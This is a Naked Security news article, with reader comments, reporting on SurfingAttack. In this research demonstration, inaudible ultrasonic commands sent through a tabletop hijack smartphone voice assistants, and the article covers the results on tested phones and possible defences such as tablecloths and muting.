Skip to content
Naked Security Naked Security

Siri and Google Assistant hacked in new ultrasonic attack

Researchers have demonstrated how voice assistants can be secretly activated without ever physically touching the device.

Unsettling news for anyone who relies on smartphone voice assistants: researchers have demonstrated how these can be secretly activated to make phone calls, take photos, and even read back text messages without ever physically touching the device.
Dubbed SurfingAttack by a US-Chinese university team, this is no parlor trick and is based on the ability to remotely control voice assistants using inaudible ultrasonic waves.
Voice assistants – the demo targeted Siri, Google Assistant, and Bixby – are designed to respond when they detect the owner’s voice after noticing a trigger phrase such as ‘Ok, Google’.
Ultimately, commands are just sound waves, which other researchers have already shown can be emulated using ultrasonic waves which humans can’t hear, providing an attacker has a line of sight on the device and the distance is short.
What SurfingAttack adds to this is the ability to send the ultrasonic commands through a solid glass or wood table on which the smartphone was sitting using a circular piezoelectric disc connected to its underside.
Although the distance was only 43cm (17 inches), hiding the disc under a surface represents a more plausible, easier-to-conceal attack method than previous techniques.
As explained in a video showcasing the method, a remote laptop generates voice commands using text-to-speech (TTS) Module to produce simulated voice commands which are then transmitted to the disc using Wi-Fi or Bluetooth.
The researchers tested the method on 17 different smartphones models from Apple, Google, Samsung, Motorola, Xiaomi, and Huawei, successfully deploying SurfingAttack against 15 of them.
The researchers were able to activate the voice assistants, commanding them to unlock devices, take repeated selfies, make fraudulent calls and even get the phone to read out a user’s text messages, including SMS verification codes.
Responses were recorded using a concealed microphone after turning down the device’s volume so this communication would not be heard by a nearby user in an office setting.

DolphinAttack rides again

In theory, voice assistants should only respond to the owner’s voice, but these can now be cloned using machine learning software such as Lyrebird, as was the case in this test. It’s a defence of sorts – the need to capture and clone the victim’s voice.
A bigger might simply be the designs of individual smartphones – the team believe the two that did not succumb to SurfingAttack, Huawei’s Mate 9 and Samsung’s Galaxy Note 10, did so because the materials from which they were constructed dampened the ultrasonic waves. According to the researchers, putting the smartphone on a tablecloth was better still.
SurfingAttack was inspired by the 2017 DolphinAttack proof-of-concept, which showed how voice assistants could be hijacked by ultrasonic commands.
Elsewhere, sound has also proved interesting to researchers looking to jump air gaps, and exfiltrate data from computer fan noise.
While hacking voice assistants remains a lab activity with no known real-world attacks to speak of, there’s always a risk that could change. At some point, smartphone makers will surely have to come up with better countermeasures.


Latest Naked Security podcast

LISTEN NOW

Click-and-drag on the soundwaves below to skip to any point in the podcast. You can also listen directly on Soundcloud.

9 Comments

This might seem simplistic but couldn’t these devices be configured to only respond to voices within the normal 85-255 Hz range?

Reply

“According to the researchers, putting the smartphone on a tablecloth was better stil” So would it not be too wild a guess to assume that the silicone case that Apple makes for the iPhone would blanket the sound?

Reply

Still a defence (though not a cure-all)
Maybe it should be easier to rename the activation phrase, so that the default “Hey Google” or “Ok Siri” or “Alexa” becomes “Garniwutz” (or another name like “Garfield-seventy four” that the user chooses). Then, not only would potentiall attackers need to capture the real voice of the owner, they would also need the real activation phrase.

Reply

Google have removed voice unlock now.

Reply

Correct – but every time someone unlocks their phone (which most people in offices will do regularly), they become vulnerable until it locks again possibly minutes later.

Reply

Have you seen the Smarter Every Day video on YouTube where they use a laser to send commands through a window to a Google Home Assistant, Amazon Echo, and even Androids and Iphones? Pretty crazy to see how it all works. Moral of the story: Don’t leave your voice assistants’ microphones in view of a window.

Reply

annoying as it is, i mute my smart home devices. Until security improves or privacy actually means what is implies, I go through the extra work of pushing the button. The next real question is “Is the button really muting?” : – \

Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

Subscribe to get the latest updates in your inbox.
Which categories are you interested in?
You’re now subscribed!